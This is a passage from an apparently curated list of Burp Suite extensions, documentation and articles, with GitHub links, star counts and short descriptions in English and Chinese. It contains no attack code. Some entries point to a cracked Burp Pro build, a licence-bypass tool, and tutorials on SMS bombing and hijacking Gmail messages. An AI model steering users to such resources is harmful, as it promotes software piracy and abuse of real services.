[spiderlabs/upnp-request-generator](https://github.com/spiderlabs/upnp-request-generator) A tool to parse UPnP descriptor XML files and generate SOAP control requests for use with Burp Suite or netcat - [**39**星][10m] [Dockerfile] [marco-lancini/docker_burp](https://github.com/marco-lancini/docker_burp) Burp Pro as a Docker Container - [**39**星][4m] [Py] [zephrfish/burpfeed](https://github.com/zephrfish/burpfeed) Hacked together script for feeding urls into Burp's Sitemap - [**36**星][2m] [Py] [0ang3el/unsafe-jax-rs-burp](https://github.com/0ang3el/unsafe-jax-rs-burp) Burp Suite extension for JAX-RS - [**36**星][8y] [Py] [gdssecurity/burpee](https://github.com/gdssecurity/burpee) Python object interface to requests/responses recorded by Burp Suite - [**36**星][1y] [Java] [ikkisoft/blazer](https://github.com/ikkisoft/blazer) Burp Suite AMF Extension - [**35**星][2y] [Java] [bit4woo/resign](https://github.com/bit4woo/ReSign) A burp extender that recalculate signature value automatically after you modified request parameter value. - [**34**星][2y] [Py] [penafieljlm/burp-tracer](https://github.com/penafieljlm/burp-tracer) BurpSuite 扩展。获取当前的站点地图,提取每个请求参数,并搜索存在请求参数值的回复 - [**33**星][4y] [Py] [peacand/burp-pytemplate](https://github.com/peacand/burp-pytemplate) Burp extension to quickly and easily develop Python complex exploits based on Burp proxy requests. - [**33**星][2m] [Java] [rub-nds/tls-attacker-burpextension](https://github.com/rub-nds/tls-attacker-burpextension) assist in the evaluation of TLS Server configurations with Burp Suite. - [**33**星][3y] [Go] [tomsteele/burpstaticscan](https://github.com/tomsteele/burpstaticscan) Use burp's JS static code analysis on code from your local system. - [**32**星][5y] [Java] [malerisch/burp-csj](https://github.com/malerisch/burp-csj) BurpCSJ extension for Burp Pro - Crawljax Selenium JUnit integration - [**30**星][2y] [Py] [aurainfosec/burp-multi-browser-highlighting](https://github.com/aurainfosec/burp-multi-browser-highlighting) Highlight Burp proxy requests made by different browsers - [**30**星][4y] [Py] [carstein/burp-extensions](https://github.com/carstein/burp-extensions) Automatically exported from code.google.com/p/burp-extensions - [**30**星][7y] [Py] [meatballs1/burp_jsbeautifier](https://github.com/meatballs1/burp_jsbeautifier) js-beautifier extension for Burp Suite - [**29**星][5y] [Java] [burp-hash/burp-hash](https://github.com/burp-hash/burp-hash) a Burp Suite plugin. - [**29**星][9m] [Java] [hvqzao/burp-flow](https://github.com/hvqzao/burp-flow) Extension providing view with filtering capabilities for both complete and incomplete requests from all burp tools. - [**29**星][13d] [Java] [silentsignal/burp-requests](https://github.com/silentsignal/burp-requests) Copy as requests plugin for Burp Suite - [**29**星][4y] [Py] [smeegesec/burp-importer](https://github.com/smeegesec/burp-importer) Burp Suite Importer - Connect to multiple web servers while populating the sitemap. - [**25**星][2y] [Py] [portswigger/burp-smart-buster](https://github.com/portswigger/burp-smart-buster) A Burp Suite content discovery plugin that add the smart into the Buster! - [**23**星][2y] [Py] [aur3lius-dev/spydir](https://github.com/aur3lius-dev/spydir) BurpSuite extension to assist with Automated Forced Browsing/Endpoint Enumeration - [**23**星][6m] [Py] [elespike/burp-cph](https://github.com/elespike/burp-cph) Custom Parameter Handler extension for Burp Suite. - [**23**星][2y] [Java] [silentsignal/burp-uuid](https://github.com/silentsignal/burp-uuid) UUID issues for Burp Suite - [**23**星][2y] [Ruby] [zidekmat/graphql_beautifier](https://github.com/zidekmat/graphql_beautifier) Burp Suite extension to help make Graphql request more readable - [**22**星][3m] [Java] [ettic-team/endpointfinder-burp](https://github.com/ettic-team/endpointfinder-burp) burp plugin to find endpoint - [**22**星][4y] [Swift] [melvinsh/burptoggle](https://github.com/melvinsh/burptoggle) Status bar application for OS X to toggle the state of the system HTTP/HTTPS proxy. - [**21**星][5y] [Java] [khai-tran/burpjdser](https://github.com/khai-tran/burpjdser) a Burp plugin that will deserialze/serialize Java request and response to and from XML with the use of Xtream library - [**21**星][3y] [Ruby] [kingsabri/burp_suite_extension_ruby](https://github.com/kingsabri/burp_suite_extension_ruby) BurpSuite Extension Ruby Template to speed up building a Burp Extension using Ruby - [**20**星][3y] [Py] [securitymb/burp-exceptions](https://github.com/securitymb/burp-exceptions) Simple trick to increase readability of exceptions raised by Burp extensions written in Python - [**20**星][30d] [Py] [yeswehack/yesweburp](https://github.com/yeswehack/yesweburp) YesWeHack Api Extension for Burp - [**19**星][9m] [Java] [hvqzao/burp-wildcard](https://github.com/hvqzao/burp-wildcard) Burp extension intended to compact Burp extension tabs by hijacking them to own tab. - [**19**星][4m] [Java] [silentsignal/burp-json-jtree](https://github.com/silentsignal/burp-json-jtree) JSON JTree viewer for Burp Suite - [**18**星][7y] [Java] [omercnet/burpjdser-ng](https://github.com/omercnet/burpjdser-ng) BurpJDSer-ng - [**18**星][3m] [Py] [xscorp/burpee](https://github.com/xscorp/burpee) A python module that accepts an HTTP request file and returns a dictionary of headers and post data - [**17**星][2y] [Visual Basic .NET] [xcanwin/xburpcrack](https://github.com/xcanwin/xburpcrack) This is a tool to bypass the cracked version of the burpsuite_pro(Larry_Lau) certification deadline through time reversal. - [**16**星][4y] [Java] [shengqi158/rsa-crypto-burp-extention](https://github.com/shengqi158/rsa-crypto-burp-extention) burp 插件 用于RSA 数据包加解密 - [**15**星][2y] [Java] [netspi/jsonbeautifier](https://github.com/netspi/jsonbeautifier) JSON Beautifier for Burp written in Java - [**15**星][29d] [Java] [augustd/burp-suite-jsonpath](https://github.com/augustd/burp-suite-jsonpath) JSONPath extension for BurpSuite - [**15**星][14d] [Java] [m4ll0k/burpsuite-random_useragent](https://github.com/m4ll0k/burpsuite-random_useragent) Burp Suite extension for generate a random user-agents - [**14**星][5y] [Java] [federicodotta/burpjdser-ng-edited](https://github.com/federicodotta/burpjdser-ng-edited) Burp Suite plugin that allow to deserialize Java objects and convert them in an XML format. Unpack also gzip responses. Based on BurpJDSer-ng of omercnet. - [**14**星][2y] [Java] [c0ny1/burp-cookie-porter](https://github.com/c0ny1/burp-cookie-porter) 一个可快速“搬运”cookie的Burp Suite插件 - [**14**星][1m] [Java] [qdghj/burp_data_collector](https://github.com/qdghj/burp_data_collector) A Burp plugin that collects Burp request parameters, directories, paths and file names into the database for sorting - [**13**星][2m] [Java] [ankokuty/belle](https://github.com/ankokuty/belle) Belle (Burp Suite 非公式日本語化ツール) - [**13**星][6y] [Java] [ioactive/burpjdser-ng](https://github.com/ioactive/burpjdser-ng) Allows you to deserialize java objects to XML and lets you dynamically load classes/jars as needed - [**13**星][9m] [Py] [modzero/burp-responseclusterer](https://github.com/modzero/burp-responseclusterer) Burp plugin that clusters responses to show an overview of received responses - [**13**星][8m] [Py] [solomonsklash/sri-check](https://github.com/SolomonSklash/sri-check) A Burp Suite extension for identifying missing Subresource Integrity attributes. - [**12**星][1m] [Java] [augustd/burp-suite-utils](https://github.com/augustd/burp-suite-utils) Utilities for creating Burp Suite Extensions. - [**12**星][2y] [Java] [hvqzao/burp-token-rewrite](https://github.com/hvqzao/burp-token-rewrite) Burp extension for automated handling of CSRF tokens - [**12**星][7y] [Py] [infodel/burp.extension-googlehack](https://github.com/infodel/burp.extension-googlehack) Burp Suite Extension providing Google Hacking Interface - [**12**星][1y] [Java] [moeinfatehi/admin-panel_finder](https://github.com/moeinfatehi/admin-panel_finder) A burp suite extension that enumerates infrastructure and application admin interfaces (OTG-CONFIG-005) - [**11**星][6y] [Py] [faffi/curlit](https://github.com/faffi/curlit) Burp plugin to turn requests into curl commands - [**11**星][9y] [Java] [gdssecurity/deflate-burp-plugin](https://github.com/gdssecurity/deflate-burp-plugin) The Deflate Burp Plugin is a plug-in for Burp Proxy (it implements the IBurpExtender interface) that decompresses HTTP response content in the ZLIB (RFC1950) and DEFLATE (RFC1951) compression formats. - [**11**星][2y] [Java] [gozo-mt/burplist](https://github.com/gozo-mt/burplist) A jython wordlist creator in-line with Burp-suite - [**11**星][3y] [Java] [h3xstream/burp-image-metadata](https://github.com/h3xstream/burp-image-metadata) Burp and ZAP plugin that display image metadata (JPEG Exif or PNG text chunk). - [**11**星][6y] [Py] [smeegesec/wsdlwizard](https://github.com/smeegesec/wsdlwizard) WSDL Wizard is a Burp Suite plugin written in Python to detect current and discover new WSDL (Web Service Definition Language) files. - [**11**星][4y] [Java] [monikamorrow/burp-suite-extension-examples](https://github.com/monikamorrow/Burp-Suite-Extension-Examples) Burp Suite starter example projects. - [**10**星][2y] [HTML] [adriancitu/burp-tabnabbing-extension](https://github.com/adriancitu/burp-tabnabbing-extension) Burp Suite Professional extension in Java for Tabnabbing attack - [**10**星][2m] [Py] [defectdojo/burp-plugin](https://github.com/defectdojo/burp-plugin) A Burp plugin to export findings to DefectDojo - [**10**星][2y] [Java] [xxux11/burpheartbleedextension](https://github.com/xxux11/burpheartbleedextension) Burp Heartbleed Extension - [**10**星][5m] [Java] [wrvenkat/burp-multistep-csrf-poc](https://github.com/wrvenkat/burp-multistep-csrf-poc) Burp extension to generate multi-step CSRF POC. - [**9**星][5y] [Java] [allfro/dotnetbeautifier](https://github.com/allfro/dotnetbeautifier) A BurpSuite extension for beautifying .NET message parameters and hiding some of the extra clutter that comes with .NET web apps (i.e. __VIEWSTATE). - [**9**星][4y] [Java] [augustd/burp-suite-gwt-scan](https://github.com/augustd/burp-suite-gwt-scan) Burp Suite plugin identifies insertion points for GWT (Google Web Toolkit) requests - [**9**星][13d] [Java] [aoncyberlabs/fastinfoset-burp-plugin](https://github.com/AonCyberLabs/FastInfoset-Burp-Plugin) Burp plugin to convert fast infoset (FI) to/from the text-based XML document format allowing easy editing - [**8**星][2y] [Java] [rammarj/csrf-poc-creator](https://github.com/rammarj/csrf-poc-creator) A Burp Suite extension for CSRF proof of concepts. - [**8**星][14d] [Java] [silentsignal/burp-cfurl-cache](https://github.com/silentsignal/burp-cfurl-cache) CFURL Cache inspector for Burp Suite - [**8**星][3m] [Py] [fsecurelabs/timeinator](https://github.com/FSecureLABS/timeinator) Timeinator is an extension for Burp Suite that can be used to perform timing attacks over an unreliable network such as the internet. - [**7**星][5m] [Java] [dibsy/staticanalyzer](https://github.com/dibsy/staticanalyzer) StaticAnalyzer is a burp plugin that can be used to perform static analysis of the response information from server during run time. It will search for specific words in the response that is mentioned in the vectors.txt - [**7**星][3y] [Ruby] [dradis/burp-dradis](https://github.com/dradis/burp-dradis) Dradis Framework extension for Burp Suite - [**7**星][1y] [Java] [fruh/extendedmacro](https://github.com/fruh/extendedmacro) ExtendedMacro - BurpSuite plugin providing extended macro functionality - [**7**星][2y] [Java] [jgillam/serphper](https://github.com/jgillam/serphper) Serialized PHP toolkit for Burp Suite - [**7**星][2y] [Java] [yehgdotnet/burp-extention-bing-translator](https://github.com/yehgdotnet/burp-extention-bing-translator) Burp Plugin - Bing Translator - [**7**星][1y] [chef-koch/windows-redstone-4-1803-data-analysis](https://github.com/chef-koch/windows-redstone-4-1803-data-analysis) Explains the telemetry, opt-out methods and provides some Whireshark/Burp dumps in order to see what MS really transmit - [**7**星][9m] [Java] [denniskniep/gqlraider](https://github.com/denniskniep/gqlraider) GQL Burp Extension - [**7**星][22d] [Java] [bytebutcher/burp-send-to](https://github.com/bytebutcher/burp-send-to) Adds a customizable "Send to..."-context-menu to your BurpSuite. - [**6**星][5m] [Java] [aress31/copy-as-powershell-requests](https://github.com/aress31/copy-as-powershell-requests) Copy as PowerShell request(s) plugin for Burp Suite (approved by PortSwigger for inclusion in their official BApp Store). - [**6**星][2m] [Java] [aress31/googleauthenticator](https://github.com/aress31/googleauthenticator) Burp Suite plugin that dynamically generates Google 2FA codes for use in session handling rules (approved by PortSwigger for inclusion in their official BApp Store). - [**6**星][5m] [Py] [maxence-schmitt/officeopenxmleditor](https://github.com/maxence-schmitt/officeopenxmleditor) Burp extension that add a tab to edit Office Open XML document (xlsx,docx,pptx) - [**6**星][2y] [Java] [silentsignal/burp-commentator](https://github.com/silentsignal/burp-commentator) Generates comments for selected request(s) based on regular expressions - [**6**星][2y] [Java] [silentsignal/burp-uniqueness](https://github.com/silentsignal/burp-uniqueness) Uniqueness plugin for Burp Suite - [**6**星][12m] [raspberrypilearning/burping-jelly-baby](https://github.com/raspberrypilearning/burping-jelly-baby) Make a Jelly Baby burp by pressing it! - [**6**星][3m] [Java] [neal1991/r-forwarder-burp](https://github.com/neal1991/r-forwarder-burp) The burp extension to forward the request - [**5**星][4y] [Py] [cyberdefenseinstitute/burp-msgpack](https://github.com/cyberdefenseinstitute/burp-msgpack) MessagePack converter - [**5**星][7y] [Py] [mwielgoszewski/jython-burp-extensions](https://github.com/mwielgoszewski/jython-burp-extensions) Jython burp extensioins - [**5**星][2m] [Ruby] [dradis/dradis-burp](https://github.com/dradis/dradis-burp) Burp Suite plugin for the Dradis Framework - [**4**星][2y] [Java] [dannegrea/tokenjar](https://github.com/dannegrea/tokenjar) Burp Suite extension. Useful for managing tokens like anti-CSRF, CSurf, Session values. Can be used to set params that require random numbers or params that are computed based on application response. - [**4**星][7y] [Py] [dnet/burp-gwt-wrapper](https://github.com/dnet/burp-gwt-wrapper) Burp Suite GWT wrapper - [**4**星][2y] [Ruby] [geoffwalton/burp-command](https://github.com/geoffwalton/burp-command) - [**4**星][14d] [Py] [niemand-sec/burp-scan-them-all](https://github.com/niemand-sec/burp-scan-them-all) Small script for automatizing Burp with Carbonator and slack - [**4**星][2y] [Java] [silentsignal/burp-git-version](https://github.com/silentsignal/burp-git-version) - [**4**星][5m] [Java] [augustd/burp-suite-swaggy](https://github.com/augustd/burp-suite-swaggy) Burp Suite extension for parsing Swagger web service definition files - [**4**星][3y] [Java] [jksecurity/burp_savetofile](https://github.com/jksecurity/burp_savetofile) BurpSuite plugin to save just the body of a request or response to a file - [**4**星][8m] [Java] [virusdefender/burptime](https://github.com/virusdefender/burptime) Burp Show Response Time - [**4**星][2m] [Java] [gdgd009xcd/automacrobuilder](https://github.com/gdgd009xcd/automacrobuilder) multi step request sequencer AutoMacroBuilder for burpsuite - [**3**星][9m] [Batchfile] [jas502n/burpsuite_pro_v1.7.11-crack](https://github.com/jas502n/burpsuite_pro_v1.7.11-crack) BurpSuite_pro_v1.7.11-Crack 破解版 抓包神器 - [**3**星][4y] [Py] [mwielgoszewski/burp-jython-tab](https://github.com/mwielgoszewski/burp-jython-tab) - [**3**星][20d] [Java] [raise-isayan/bigipdiscover](https://github.com/raise-isayan/bigipdiscover) It becomes the extension of Burp suite. The cookie set by the BipIP server may include a private IP, which is an extension to detect that IP - [**3**星][2y] [Py] [snoopysecurity/noopener-burp-extension](https://github.com/snoopysecurity/noopener-burp-extension) Find Target="_blank" values within web pages that are set without 'noopener' and 'noreferrer' attributes - [**3**星][4y] [Py] [vergl4s/signatures](https://github.com/vergl4s/signatures) Length extension attacks in Burp Suite - [**3**星][3y] [Java] [cnotin/burp-scan-manual-insertion-point](https://github.com/cnotin/burp-scan-manual-insertion-point) Burp Suite Pro extension - [**3**星][11d] [Py] [akabe1/upnp-bhunter](https://github.com/akabe1/upnp-bhunter) Burp Suite Extension useful to inspect UPnP security - [**3**星][8m] [Py] [solomonsklash/cookie-decrypter](https://github.com/solomonsklash/cookie-decrypter) A Burp Suite Professional extension for decrypting/decoding various types of cookies. - [**2**星][1y] [Py] [bao7uo/burpelfish](https://github.com/bao7uo/burpelfish) BurpelFish - Adds Google Translate to Burp's Context Menu. "Babel Fish" language translation for app-sec testing in other languages. - [**2**星][2y] [Java] [cornerpirate/demoextender](https://github.com/cornerpirate/demoextender) Code used for a tutorial to get Netbeans GUI editor to work with a Burp Suite Extender - [**2**星][4y] [Py] [d453d2/burp-jython-console](https://github.com/d453d2/burp-jython-console) Burp Suite extension to enable a Jython console - origin ( - [**2**星][2y] [Py] [dnet/burp-scripts](https://github.com/dnet/burp-scripts) Scripts I wrote to extend Burp Suite functionality - [**2**星][7y] [Py] [meatballs1/burp_wicket_handler](https://github.com/meatballs1/burp_wicket_handler) - [**2**星][3y] [Java] [silentsignal/burp-json-array](https://github.com/silentsignal/burp-json-array) JSON Array issues plugin for Burp Suite - [**2**星][2y] [stayliv3/burpsuite-magic](https://github.com/stayliv3/burpsuite-magic) 收集burpsuite插件,并对每个插件编写使用说明手册。 - [**2**星][3y] [Ruby] [thec00n/uploader](https://github.com/thec00n/uploader) Burp extension to test for directory traversal attacks in insecure file uploads - [**2**星][8y] [Java] [thecao365/burp-suite-beautifier-extension](https://github.com/thecao365/burp-suite-beautifier-extension) burp-suite-beautifier-extension - [**2**星][3m] [Java] [peachtech/peachapisec-burp](https://github.com/peachtech/peachapisec-burp) Peach API Security Burp Integration - [**2**星][3m] [Java] [parsiya/burp-sample-extension-java](https://github.com/parsiya/burp-sample-extension-java) Sample Burp Extension in Java - [**1**星][3y] [Java] [chris-atredis/burpchat](https://github.com/chris-atredis/burpchat) burpChat is a BurpSuite plugin that enables collaborative BurpSuite usage using XMPP/Jabber. - [**1**星][3m] [Java] [infobyte/faraday_burp](https://github.com/infobyte/faraday_burp) Faraday Burp Extension - [**1**星][11m] [Java] [jonluca/burp-copy-as-node](https://github.com/jonluca/burp-copy-as-node) Burp extension to copy a request as a node.js requests function - [**1**星][2y] [Java] [sampsonc/perfmon](https://github.com/sampsonc/perfmon) Performance metrics for Burp Suite - [**1**星][3y] [Java] [tagomaru/burp-extension-sync-parameter](https://github.com/tagomaru/burp-extension-sync-parameter) an extension to Burp Suite that provides a sync function for CSRF token parameter. - [**1**星][5m] [Py] [bomsi/blockerlite](https://github.com/bomsi/blockerlite) Simple Burp extension to drop blacklisted hosts - [**1**星][4y] [Py] [hvqzao/burp-csrf-handling](https://github.com/hvqzao/burp-csrf-handling) CSRF tokens handling Burp extension - [**1**星][3m] [Java] [sunny0day/burp-auto-drop](https://github.com/sunny0day/burp-auto-drop) Burp extension to automatically drop requests that match a certain regex. - [**0**星][4y] [fbogner/burp.app](https://github.com/fbogner/burp.app) A small AppleScript wrapper application around Burp.jar to make it more OS X like - [**0**星][1y] [jgamblin/burptest](https://github.com/jgamblin/burptest) - [**0**星][2y] [kkirsche/burp_suite_lists](https://github.com/kkirsche/burp_suite_lists) Lists to use with Burp Suite - [**0**星][2y] [Java] [silentsignal/burp-asn1](https://github.com/silentsignal/burp-asn1) ASN.1 toolbox for Burp Suite - [**0**星][9m] [Java] [celsogbezerra/copy-as-javascript-request](https://github.com/celsogbezerra/copy-as-javascript-request) Copy as JavaScript Request plugin for Burp Suite - [**0**星][1y] [Py] [nagakm/throttler](https://github.com/nagakm/Throttler) This extension is for Burpsuite - [**0**星][2y] [Py] [nagakm/throttler](https://github.com/nagakm/throttler) This extension is for Burpsuite *** ## <a id="937f31acfb275a8ed8ab47cf9d5817b7"></a>文档 - [**736**星][2y] [JS] [xl7dev/burpsuite](https://github.com/xl7dev/burpsuite) BurpSuite using the document and some extensions - [**299**星][1y] [Shell] [yw9381/burp_suite_doc_zh_cn](https://github.com/yw9381/burp_suite_doc_zh_cn) 这是基于Burp Suite官方文档翻译而来的中文版文档 - [**12**星][3m] [boreas514/burp-suite-2.0-chinese-document](https://github.com/boreas514/burp-suite-2.0-chinese-document) 中文版burp2.0官方文档 # <a id="dab83e734c8176aae854176552bff628"></a>文章 *** ## <a id="b5b59b6b602121e87742e7467cf6e377"></a>新添加 - 2020.01 [portswigger] [Burp Suite roadmap for 2020 | Blog - PortSwigger](https://portswigger.net/blog/burp-suite-roadmap-for-2020) - 2019.12 [aliyun] [如何利用xray、burp、lsc构成自动化挖src平台](https://xz.aliyun.com/t/7007) - 2019.11 [parsiya] [Swing in Python Burp Extensions - Part 3 - Tips and Tricks](https://parsiya.net/blog/2019-11-26-swing-in-python-burp-extensions-part-3-tips-and-tricks/) - 2019.11 [parsiya] [Swing in Python Burp Extensions - Part 2 - NetBeans and TableModels](https://parsiya.net/blog/2019-11-11-swing-in-python-burp-extensions-part-2-netbeans-and-tablemodels/) - 2019.11 [parsiya] [Swing in Python Burp Extensions - Part 1](https://parsiya.net/blog/2019-11-04-swing-in-python-burp-extensions-part-1/) - 2019.10 [parsiya] [Quality of Life Tips and Tricks - Burp Suite](https://parsiya.net/blog/2019-10-13-quality-of-life-tips-and-tricks-burp-suite/) - 2019.10 [freebuf] [使用Burp拦截Flutter App与其后端的通信](https://www.freebuf.com/articles/terminal/213346.html) - 2019.09 [BrokenSecurity] [033 part of Ethical Hacking - Editing packets in Burpsuite](https://www.youtube.com/watch?v=o8yLE8Ls81I) - 2019.09 [BrokenSecurity] [032 part of Ethical Hacking - Burpsuite configuration](https://www.youtube.com/watch?v=m_SLme98650) - 2019.09 [radekk] [Firefox and Burp Suite — the most secure configuration](https://medium.com/p/3c08e6c23194) - 2019.07 [0x00sec] [Doubt with header. Burp & Tamper](https://0x00sec.org/t/doubt-with-header-burp-tamper/15197) - 2019.06 [sirpwnalot] [Hunting for Privilege Escalation with Burp Suite](https://sirpwnalot.blogspot.com/2019/06/hunting-for-privilege-escalation-with.html) - 2019.06 [appsecconsulting] [Ten Useful Burp Suite Pro Extensions for Web Application Testing](https://appsecconsulting.com/blog/ten-useful-burp-suite-pro-extensions-for-web-application-testing) - 2019.05 [d3adend] [Argument Injection Hammer Burp Suite Extension](https://d3adend.org/blog/posts/argument-injection-hammer/) - 2019.05 [infosecaddicts] [Burp Suite](https://infosecaddicts.com/burp-suite-2/) - 2019.04 [parsiya] [Disabling Burp's Update Screen - Part 1 - Analysis and Failures](https://parsiya.net/blog/2019-04-21-disabling-burps-update-screen-part-1-analysis-and-failures/) - 2019.02 [infosecinstitute] [Quick and Dirty BurpSuite Tutorial (2019 Update)](https://resources.infosecinstitute.com/burpsuite-tutorial/) - 2019.02 [pentestpartners] [Burp HMAC header extensions, a how-to](https://www.pentestpartners.com/security-blog/burp-hmac-header-extensions-a-how-to/) - 2018.12 [parsiya] [Cryptography in Python Burp Extensions](https://parsiya.net/blog/2018-12-24-cryptography-in-python-burp-extensions/) - 2018.12 [parsiya] [Python Utility Modules for Burp Extensions](https://parsiya.net/blog/2018-12-19-python-utility-modules-for-burp-extensions/) - 2018.12 [parsiya] [使用Burp的网站地图比较功能, 检测强制浏览/访问控制/直接对象引用等问题](https://parsiya.net/blog/2018-12-17-tiredful-api---part-2---comparing-site-maps-with-burp/) - 2018.12 [parsiya] [Tiredful API - Part 2 - Comparing Site Maps with Burp](https://parsiya.net/blog/2018-12-17-tiredful-api-part-2-comparing-site-maps-with-burp/) - 2018.11 [wallarm] [FAST or Burp or both?](https://medium.com/p/e61a935c9aca) - 2018.11 [arbazhussain] [Broken Link Hijacking Burp Plugin](https://medium.com/p/6918d922c3fb) - 2018.11 [jerrygamblin] [Automatically Create Github Issues From Burp 2.0](https://jerrygamblin.com/2018/11/07/automatically-create-github-issues-from-burp-2-0/) - 2018.08 [portswigger] [Burp Suite Enterprise Edition beta now available | Blog](https://portswigger.net/blog/burp-suite-enterprise-edition-beta-now-available) - 2018.08 [portswigger] [Burp's new crawler | Blog](https://portswigger.net/blog/burps-new-crawler) - 2018.07 [cqureacademy] [How To Burp With Confidence – Our 5 Favorite Features](https://cqureacademy.com/blog/penetration-testing/how-to-burp-our-5-favorite-features) - 2018.07 [freebuf] [使用VirtualBox,INetSim和Burp建立自己的恶意软件分析实验环境](http://www.freebuf.com/articles/system/177601.html) - 2018.07 [web] [Support for XXE attacks in SAML in our Burp Suite extension](https://web-in-security.blogspot.com/2018/07/support-for-xxe-attacks-in-saml-in-our.html) - 2018.06 [finnwea] [An efficiency improvement for Burp Suite](https://finnwea.com/blog/an-efficiency-improvement-for-burp-suite/) - 2018.06 [finnwea] [An efficiency improvement for Burp Suite](https://tij.me/blog/an-efficiency-improvement-for-burp-suite/) - 2018.05 [hackerone] [New Hacker101 Content: Threat modeling, Burp basics, and more](https://www.hackerone.com/blog/New-Hacker101-Content-Threat-modeling-Burp-basics-and-more) - 2018.04 [dustri] [Confusing Burp's display with fake encoding](https://dustri.org/b/confusing-burps-display-with-fake-encoding.html) - 2018.03 [secureideas] [Burp Suite continuing the Saga](https://blog.secureideas.com/2018/03/burp-suite-continuing-the-saga.html) - 2018.03 [blackhillsinfosec] [Gathering Usernames from Google LinkedIn Results Using Burp Suite Pro](https://www.blackhillsinfosec.com/gathering-usernames-from-google-linkedin-results-using-burp-suite-pro/) - 2018.02 [hackingarticles] [Advance Web Application Testing using Burpsuite](http://www.hackingarticles.in/advance-web-application-testing-using-burpsuite/) - 2018.02 [HackerSploit] [Web App Penetration Testing - #1 - Setting Up Burp Suite](https://www.youtube.com/watch?v=YCCrVtvAu2I) - 2018.02 [hackingarticles] [Engagement Tools Tutorial in Burp suite](http://www.hackingarticles.in/engagement-tools-tutorial-burp-suite/) - 2018.01 [360] [恶意软件逆向:burpsuite 序列号器后门分析](https://www.anquanke.com/post/id/96866/) - 2018.01 [hackingarticles] [WordPress Exploitation using Burpsuite (Burp_wp Plugin)](http://www.hackingarticles.in/wordpress-exploitation-using-burpsuite-burp_wp-plugin/) - 2018.01 [blackhillsinfosec] [Analyzing Extension Effectiveness with Burp](https://www.blackhillsinfosec.com/analyzing-extension-effectiveness-burp/) - 2018.01 [4hou] [实战教程:用Burpsuite测试移动应用程序](http://www.4hou.com/penetration/8965.html) - 2017.12 [freebuf] [经验分享 | Burpsuite插件的使用](http://www.freebuf.com/sectool/158005.html) - 2017.12 [picturoku] [Burp... (excuse me) ...suite](http://picturoku.blogspot.com/2017/12/burp-excuse-me-suite.html) - 2017.12 [freebuf] [新手福利 | Burpsuite你可能不知道的技巧](http://www.freebuf.com/articles/rookie/156928.html) - 2017.12 [aliyun] [使用OWASP Zap度过没有Burp的过渡期](https://xz.aliyun.com/t/1782) - 2017.12 [freebuf] [利用Burp Suite挖掘暗网服务的真实IP](http://www.freebuf.com/articles/web/155254.html) - 2017.11 [n00py] [Exploiting blind Java deserialization with Burp and Ysoserial](https://www.n00py.io/2017/11/exploiting-blind-java-deserialization-with-burp-and-ysoserial/) - 2017.10 [freebuf] [利用Burp Suite对OWASP Juice Shop进行渗透测试](http://www.freebuf.com/sectool/151920.html) - 2017.10 [gdssecurity] [Pentesting Fast Infoset based web applications with Burp](https://blog.gdssecurity.com/labs/2017/10/10/pentesting-fast-infoset-based-web-applications-with-burp.html) - 2017.10 [d0znpp] [The best Burp plugin I’ve ever seen](https://medium.com/p/2d17780342) - 2017.10 [n00py] [How to Burp Good](https://www.n00py.io/2017/10/how-to-burp-good/) - 2017.09 [niemand] [Automatizing Burp + Carbonator + Slack](https://niemand.com.ar/2017/09/18/automatizing-burp-carbonator-slack/) - 2017.09 [trustwave] [burplay介绍](https://www.trustwave.com/Resources/SpiderLabs-Blog/Introducing-Burplay,-A-Burp-Extension-for-Detecting-Privilege-Escalations/) - 2017.09 [initblog] [Hacking a Pizza Order with Burp Suite](https://initblog.com/2017/pizza-hacking/) - 2017.09 [freebuf] [如何在特定的渗透测试中使用正确的Burp扩展插件](http://www.freebuf.com/sectool/146247.html) - 2017.08 [portswigger] [如何为特定的渗透测试环境定制 Burp 扩展](https://portswigger.net/blog/adapting-burp-extensions-for-tailored-pentesting) - 2017.08 [cybrary] [Your Complete Guide to Burp Suite](https://www.cybrary.it/2017/08/your-complete-guide-to-burp-suite/) - 2017.07 [hackerone] [Hey Hackers: We’ve got your free Burp Suite Professional license right here](https://www.hackerone.com/blog/Hey-Hackers-Weve-got-your-free-Burp-Suite-Professional-license-right-here) - 2017.07 [aliyun] [Burpsuite handshake alert: unrecognized_name解决办法](https://xz.aliyun.com/t/1080) - 2017.07 [4hou] [用VirtualBox、INetSim和Burp配置一个恶意软件分析实验室](http://www.4hou.com/technology/5655.html) - 2017.06 [portswigger] [Behind enemy lines: bug hunting with Burp Infiltrator | Blog](https://portswigger.net/blog/behind-enemy-lines-bug-hunting-with-burp-infiltrator) - 2017.06 [christophetd] [使用 VirtualBox,INetSim和 Burp 搭建自己的恶意软件分析实验室](https://blog.christophetd.fr/malware-analysis-lab-with-virtualbox-inetsim-and-burp/) - 2017.05 [360] [Burp Suite Mobile Assistant](https://www.anquanke.com/post/id/86117/) - 2017.05 [netspi] [Beautifying JSON in Burp](https://blog.netspi.com/beautifying-json-in-burp/) - 2017.04 [aliyun] [Burp Suite收集到的录像、文档以及视频资料](https://xz.aliyun.com/t/1175) - 2017.02 [zsec] [Learning the Ropes 101: Burp Suite Intro](https://blog.zsec.uk/ltr101-burp-suite-intro/) - 2017.02 [netspi] [Attacking JavaScript Web Service Proxies with Burp](https://blog.netspi.com/attacking-javascript-web-service-proxies-burp/) - 2017.02 [polaris] [BurpSuite和Fiddler串联使用解决App测试漏包和速度慢的问题](http://polaris-lab.com/index.php/archives/15/) - 2017.01 [securityinnovation] [Solve the Software Security Authorization Testing Riddle with AuthMatrix for Burp Suite](https://blog.securityinnovation.com/solve-the-software-security-authorization-testing-riddle-with-authmatrix-for-burp-suite) - 2016.12 [polaris] [BurpSuite插件分享:图形化重算sign和参数加解密插件](http://polaris-lab.com/index.php/archives/19/) - 2016.12 [rapid7] [Burp Series: Intercepting and modifying made easy](https://blog.rapid7.com/2016/12/09/burp-series-intercepting-and-modifying-made-easy/) - 2016.12 [polaris] [BurpSuite 实战指南](http://polaris-lab.com/index.php/archives/136/) - 2016.12 [360] [BurpSuite 实战指南(附下载地址)](https://www.anquanke.com/post/id/85086/) - 2016.11 [freebuf] [渗透测试神器Burp Suite v1.7.08发布(含下载)](http://www.freebuf.com/sectool/118802.html) - 2016.10 [averagesecurityguy] [Recon-ng + Google Dorks + Burp = ...](https://averagesecurityguy.github.io/2016/10/21/recon-ng-dorks-burp/) - 2016.10 [hackingarticles] [SMS Bombing on Mobile using Burpsuite](http://www.hackingarticles.in/sms-bombing-mobile-using-burpsuite/) - 2016.09 [hackingarticles] [Hijacking Gmail Message on Air using Burpsuite](http://www.hackingarticles.in/hijacking-gmail-message-air-using-burpsuite/) - 2016.09 [securify] [Burp 